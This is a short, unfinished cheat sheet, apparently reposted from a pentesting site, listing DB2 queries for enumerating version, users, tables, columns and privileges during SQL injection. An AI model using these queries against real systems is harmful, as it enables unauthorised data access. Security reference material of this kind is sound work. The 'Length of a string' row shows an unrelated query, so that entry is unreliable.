DB2 SQL Injection Cheat Sheet

Finding a SQL injection vulnerability in a web application backed by DB2 isn't too common in my experience.  When you do find one, though it pays to be prepared...

Below are some tabulated notes on how to do many of thing you'd normally do via SQL injection.  All tests were performed on DB2 8.2 under Windows. 

Description SQL / Comments 
Comments select blah from foo; -- comment like this
 Batching Queries Allowed?
???
 Database Version

select versionnumber, version_timestamp from sysibm.sysversions;

 Current Database User

select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;

 System User for Current Connection
select system_user from sysibm.sysdummy1;
 Current Database
select current server from sysibm.sysdummy1;
 Limiting Rows Returned

SELECT foo FROM bar fetch first 1 rows only;

Returning N Rows starting at Offset M select name from (SELECT name FROM sysibm.systables order by
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
 List Tables
select name from sysibm.systables;
 List Columns
select name, tbname, coltype from sysibm.syscolumns;
 List Databse Users and Passwords
Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;
 FROM clause mandated in SELECTs? Yes, use sysibm.sysdummy1:
select 123 from sysibm.sysdummy1;
 UNION supported
Yes
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
 Enumerate Tables Privs
select * from syscat.tabauth;
 Enumerate Current Privs
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
 Length of a string select name, tbname, coltype from sysibm.syscolumns; -- returns 3
 Bitwise AND
This page seems to indicate that DB2 has no support for bitwise operators!
 Substring

SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1;  -- returns b

 ASCII value of a character
select ascii('A') from sysibm.sysdummy1; -- returns 65
Character from ASCII value
select chr(65) from sysibm.sysdummy1; -- returns 'A'
 Roles and passwords
N/A (I think DB2 uses OS-level user accounts for authentication.)
List Database Procedures
 ???
Create Users + Granting Privs  ???
 Time Delays
 ???
 Execute OS Commands  ???
 Write to File System  ???
 Concatenation SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'
 Casting SELECT cast('123' as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;
List schemas SELECT schemaname FROM syscat.schemata;

This page will probably remain a work-in-progress for some time yet.  I'll update it as I learn more.

 

你可能感兴趣的:(inject)